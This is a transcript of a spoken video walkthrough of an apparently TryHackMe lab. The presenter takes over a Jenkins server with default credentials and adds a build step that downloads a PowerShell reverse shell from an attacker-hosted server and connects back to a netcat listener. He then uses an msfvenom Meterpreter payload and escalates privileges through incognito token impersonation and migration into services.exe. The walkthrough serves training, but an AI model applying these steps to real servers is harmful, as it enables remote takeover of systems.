machine, the victim machine, didn't crash. It was my attack box that crashed. So if the victim machine doesn't crash, that means everything that we uploaded to Jenkins previously should have already been there. For example, the initial shell that we created and transferred for Metasploit, right? So I recreated another one called shell name 2 with the new IP address for the attack box that was issued, because this IP address right here, it changed. So I had to just recreate the payload, and I needed to update all of the commands inside of the configuration section to include the new IP address. And then one of the things that kind of was a pain in the butt towards the end was that there was no space between this portion right here. So even though I changed it to shell name 2 and shell name 2, and I updated the IP address, even though I did all that, it wasn't working. So every time that I did it, it would do the first part where it would download, as you can see it would download the PowerShell script, but it wouldn't actually download the shell, the second shell. So anyways, all of that is now done, and we actually have our interpreter session, which is great. So now we can actually follow along with the rest of our commands here, which was, view all the privileges using whoami/priv. So this is what we're going to do now. So we're going to do whoami and then do /priv just to see. And okay, so it doesn't work here. So I guess it would be inside of this session where we would do that. So whoami /priv, and there we go. So we have all of these privileges, and the ones that are enabled are the ones that we're most interested in. So we have SE bug, debug privilege, we have change notify privilege, impersonate privilege, there we go, and create global privilege. So we do see that. So you can see that 2 privileges, debug and impersonate, are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter load incognito in Metasploit. So this is where we would go here probably and do a load incognito like that. Loading extension incognito successfully. Okay, great. You may need to use incognito. We didn't need to do that, so I just did load incognito. Okay, great. To check which tokens are available, enter the list tokens -g, and we can see that built-in administrators token is available. So let's do list _tokens -g. I wonder if, I think it's here, -g. And so it says the term list, etc., etc., is not recognized. So I guess it's not in that one. So we would do it probably in here then. So let's go to here, list _tokens -g. Okay, there it is. So we do the list _tokens inside of the Metasploit window. So we have built-in admin, built-in users, NT authority, NT service, all these things. So it says we can see that the built-in administrators is available, so we can use the impersonate token built-in administrators command to impersonate the administrator token. What is the output when you run get UID? So we're going to do impersonate _token and then built-in administrators. So that's what we're going to do. Impersonate _token and then built-in, like that, I believe, administrators. Like that. So let's see if we did that correctly. Built-in, yep, built-in /administrators. So we're going to do that. Successfully impersonated. Okay, great. So that's good. So now we want the get UID. So let's see. Get UID. And it says NT authority system is our server. Very good. So, okay, so that did work. NT authority /system. Very good. So even though you have a higher privilege token, you may not have the permissions of a privileged user. This is due to the way Windows handles permissions, and it uses the primary token of the process and not the impersonated token. So ensure that you migrate to a process with the correct permissions. The above questions answer. The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services process. Migrate to this using that, and then read the root txt file. Now, I have done this series of actions in previous exercises before, and I'm always just kind of baffled that even though our user ID is this, they're asking us to migrate. And when you migrate, it's not the most stable process that you're doing when you migrate to anything. So it may not necessarily work for us. It may actually lose our connection. So the first thing that I'm going to do is I'm going to try to get this file before I migrate. Because again, based on previous experiences, if I already have this permission, I shouldn't need to do this whole migration process. So I'm just going to try to read the file first. So we need to go to Windows System32 and configuration inside of this location. So if we're here, we're going to do print working directory. That's where we are. So we want to go back a few and see where we are now, and go back one more time and where we are. So, okay, now we're going to go into Windows, and there we go, Windows, and then System32. And there we go. And what is the other System32? Config. So cd config. And now we are inside of config. So now we want the root txt file. Type command for more details. Oh, type does not exist. It is root txt, so maybe cat. So let's do cat. Operation failed. The system cannot find the file specified. So there is no root txt file. Okay. All right, so fine. So Windows System32 config right here, we can't see it because it doesn't exist for us in this particular case. So fine. Now I'm willing to run the processes and find the one that says services.ext or service.exe. Let's see if that actually even exists here. And then migrate to that. So it's not here. Do you see what I'm saying? Like, this is the thing that kind of bothers me with this whole thing, where it's like, okay, well, why can't I can't find it, bro. So, all right, so they're saying to do what? To find something, find the process of the services.exe process, migrate to this process using the command migrate and then the PID of the process. But there is no service.exe. That's the issue. I don't know if you just heard my dog sneeze in the background. Okay, so let me see if I can find the service.exe, or maybe I missed it. I can't possibly have missed it, but let's see if I missed it. Maybe I missed it. I did miss it. So it is right here, services.exe. The PID is 668. So here's our fingers crossed right here. I just hope that this works. So migrate 668. Migrating from 1720 to 668. And let's see if that's oh, okay. So there we go. So now it actually worked. So now we should be still in our current location, or are we not in our current? Or we are. Okay, great. So now in this place, do we have root.txt in here? Interesting. So in the services, there's clearly a bunch more stuff that's available. So let me see if I can find the root.txt file. Usually every single time that I've done this, it doesn't work. Like, it has not worked for me every time that I did the migrate thing, which is really annoying. So Windows System 32, I see. So we need to go from System 32 to config. So let's go into config and do an ls. There is the root.txt. Wonderful. And there it is. Okay, great. And we know that we don't want those first two characters. We just want that last, the section after that. Submit. Beautiful. Okay. All right. There you go. That was it. That was the last series of questions. So hopefully that worked the same for you. And hopefully that wasn't too loud of a sound effect. Those sound effects tend to be kind of really loud. All right, so I will say this, that this actually, it was not that bad, with the exception of the fact that I had to go and do the whole connection one more time because I lost my connection. That really was unfortunate, and it was a pain in the behind. However, apart from that, everything was pretty straightforward. It was pretty easy. There are a few things that we always want to keep in mind when we do exercises like this, and it's the various elements of everything that we did in junior pen tester and everything that we did up until this point to fill in the blanks, because these exercises don't give you step-by-step detailed instructions. So I try to hopefully, and usually I think out loud when I do these exercises, and hopefully it doesn't confuse you, you know what I mean? So really the first piece was to be using the reverse shell TCP script that was here. So this was the piece that we had to download onto our machine. So whether or not you're using the attack box of TryHackMe or you're using your own attack box, your own Kali Linux box, whatever it is, this is the script that everything was centered around. So once we had that, then we were able to go ahead and basically just run that nmap scan to find it. You did not need to use GoBuster. You could have just gone to the port 8080, which was the open port that Jenkins was installed on. So you could have just gone that way, and then from there you would have been able to do everything else. So the username and password was just very default admin. Then we had to create so even in the same project that existed, you click configure. So that was the piece, right? So this is the piece right here that was kind of the initial challenge. So you click configure, you go to build, and then inside of build, you add a new step, and that step would be this. So once you click add new step, you do Windows batch step, and then you paste this in, and then the piece of that was to make sure to update the IP address to either the IP address of your attack box or the IP address of your Linux machine. And then of course also put the port that you're going to run the Python server on, which was this next step right here. So we needed to do these two in the same series of steps. One terminal window is going to have the Python server, and on that Python server, you would choose a port that you would serve on. For me, I did 8080. And then so the IP address of your actual attack box, as well as the port that you're serving on. And then this would work to download that PowerShell script right here. So once you have that, right, in the same step, so it's actually, so I guess there's 3 steps to it. So in the same step, you would also have another terminal that was open that would run your netcat listener. And this was not shown to us right here. So this was a missing piece right here, that you need to have a netcat listener to establish that reverse shell. So let me, I'm going to open this back up for you just so we can kind of see what that looks like when we go through these specific steps. So we had, and hopefully this will actually, okay, there we go. So we actually had our connection. Let me see if I can, oh man, what did I just do? I was supposed to zoom out and I did it over here and something happened and I lost my Metasploit connection. So that's my bad. But so this is the Python server window, and then this was the netcat listener window. And inside the netcat listener window, we had to have netcat actually running. And so for me, it was on port 4444. And then we needed to have the Python web server running, which was for me on port 8080. So this command right here, the first portion of it is to download that PowerShell script from your Python server. The next portion right here is to establish that connection to your netcat listener. So on port 4444, that's where my netcat listener was sitting, and this is the IP address of my attack box. So these two commands that we ran, both of these commands inside of our build, so right here, so when we go to the configure and we click on build, this is where we input those. This was that first series of commands right here. And inside of this, by running this, when we exit that and we actually click on build now, when we click on build now, the file gets downloaded from the Python server, and then the netcat listener establishes its connection. So this was the first one. the next thing we had to do was to go ahead and establish our switching of our shells using MSF Venom. So I had another window, our third terminal window, which was this, which I kind of just destroyed right here. As you can see, I ruined it. But I did this command first, right? The listening host IP address is the IP address of my attack box. The listening port would be a separate port. So my final listening port was port 2222. And then I ended up just recreating the file. So all of this it worked fine the first time. It was just the connection to the try-hack-me attack box got lost. So I had to repeat those steps. But the very first time that it happened, everything was fine. Everything worked. So we did MSF Venom to create the payload. Then I did MSF console, and I opened it up inside of that same window that I built this payload. And then I established which all of this you can just go back and rewatch for this section, and all of that would work exactly as it was the first time. And then we added this step into Jenkins. That was the last piece, which was this thing right here. When we go back into configure, we actually had a second step we added to Jenkins, which was this piece right here. And this, the second time that I had to go through this after I lost my connection, the key piece was just making sure that there was a space between this comma and that colon, or that, not colon, the comma and the asterisk, like the single quote. I didn't have a space, so I kept running it and it didn't work. So just make sure that you have that. And then you would have two commands in here, right? So the second command, or why is this, now it's frozen again. Good Lord, man, whatever. As long as we're done, that's fine. So we would run the commands again, right? We would run that build one more time. We would click build now, and then it would establish the connection again with the netcat listener. And then from there, you should have the shell downloaded into your list of downloads. So if we go over here, assuming that this screen doesn't freeze, that's so annoying. But in that same window that we had the netcat listener, if you just type ls to list everything that's been downloaded, you should see that shell. And then you would do start process and then the shell. And then the Metasploit window would actually establish your Meterpreter session. And then from there, you can move on to the privilege escalation portion of it, which is basically everything else that you saw at the end, which worked with no hitch. So the privilege escalation section of this video worked exactly as it was supposed to. And we ran it and we migrated to that process, and everything else worked, and we established our final flag. So hopefully that was useful, and hopefully you were able to achieve all of the results that I achieved through that entire process. If you found this video useful and you would like to get more videos like this one, then I encourage you to like, subscribe, and turn on the notification bell so that you get notified the next time that a video comes out on this channel, including the CompTIA PenTest Plus pathway, as well as the offensive pen testing pathway. And of course, we have the AI for cybersecurity pathway that has been recently launched, and I'm super excited about that. And there's more videos about that coming up as well. And then there are several other videos that were requested by our community, which means that if you drop comments, I actually listen to the comments and I develop content based on the requests that people have made. And the specific requests were how to set up a lab environment. So I have not done anything on the how-to of, okay, do this and then do this and do this, with the exception of the Linux Plus video that kind of shows you how to download and install a virtual machine. With the exception of that video, there was nothing else that I've done. So we're going to end up doing that. I'm going to set up that video of how to download and install a lab environment for penetration testing, as well as a lab environment for security analysis and things like that. So we'll do the lab environment videos. And then there's another one for the career path of each individual career. So of what to do and what needs to be done to set yourself up to land a career in a given field. So I will go ahead and do that as well, of the step-by-step of how to establish your path to actually end up at your dream career in IT. And those two ideas came from the comment section. So if you drop comments in the comment section, then I will go ahead and read them. And if they're useful, if I think that they're going to be useful to our community, I'm going to create those videos. So that's basically where those things came from. So if you have not done so already, make sure that you like, subscribe, and turn on the notification bell, drop a comment, and of course, check out all the content that's available on this channel already to see if there's anything that you need that applies to you specifically. If you want access to my notes and exclusive downloads and to get lifetime access to me on Discord, consider joining Hackaholics Anonymous. We have 4 tiers. We have the supporter, the agent, the guardian, and the master. Each tier gets their own Discord server and early access to content. The agent, guardian, and master levels get exclusive content, exclusive downloads, monthly Python automations, live streams with me every single month, plus so much more. And to join, you can simply click the link in the description below and you will be able to choose the tier for which you want to join. I really hope I see you in the Discord chats. If not, I hope I see you in the comment section. It's your boy Hank Hackerson at Hank Hacks Hackers, your favorite network and system attacker / protector. If no one else loves you, Hank loves you. Love, peace, and chicken grease. And I will see you in the next video later.